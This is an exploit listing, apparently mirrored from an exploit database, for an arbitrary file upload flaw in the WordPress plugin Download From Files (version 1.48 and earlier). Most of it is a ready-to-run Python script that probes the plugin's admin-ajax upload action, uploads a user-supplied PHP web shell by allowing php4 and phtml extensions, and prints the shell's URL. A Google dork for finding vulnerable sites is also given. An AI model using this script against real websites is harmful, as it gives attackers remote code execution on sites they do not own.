Exploit for WordPress Download From Files 1.48 Shell Upload

## https://sploitus.com/exploit?id=PACKETSTORM:164125
# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload  
# Google Dork: inurl:/wp-content/plugins/download-from-files  
# Date: 10/09/2021  
# Exploit Author: spacehen  
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/  
# Version: <= 1.48  
# Tested on: Ubuntu 20.04.1 LTS (x86)  
  
import os.path  
from os import path  
import json  
import requests;  
import sys  
  
def print_banner():  
print("Download From Files <= 1.48 - Arbitrary File Upload")  
print("Author -> spacehen (www.github.com/spacehen)")  
  
def print_usage():  
print("Usage: python3 exploit.py [target url] [php file]")  
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")  
  
def vuln_check(uri):  
response = requests.get(uri)  
raw = response.text  
  
if ("Sikeres" in raw):  
return True;  
else:  
return False;  
  
def main():  
  
print_banner()  
if(len(sys.argv) != 3):  
print_usage();  
sys.exit(1);  
  
base = sys.argv[1]  
file_path = sys.argv[2]  
  
ajax_action = 'download_from_files_617_fileupload'  
admin = '/wp-admin/admin-ajax.php';  
  
uri = base + admin + '?action=' + ajax_action ;  
check = vuln_check(uri);  
  
if(check == False):  
print("(*) Target not vulnerable!");  
sys.exit(1)  
  
if( path.isfile(file_path) == False):  
print("(*) Invalid file!")  
sys.exit(1)  
  
files = {'files[]' : open(file_path)}  
data = {  
"allowExt" : "php4,phtml",  
"filesName" : "files",  
"maxSize" : "1000",  
"uploadDir" : "."  
}  
print("Uploading Shell...");  
response = requests.post(uri, files=files, data=data )  
file_name = path.basename(file_path)  
if("ok" in response.text):  
print("Shell Uploaded!")  
if(base[-1] != '/'):  
base += '/'  
print(base + "wp-admin/" + file_name);  
else:  
print("Shell Upload Failed")  
sys.exit(1)  
  
main();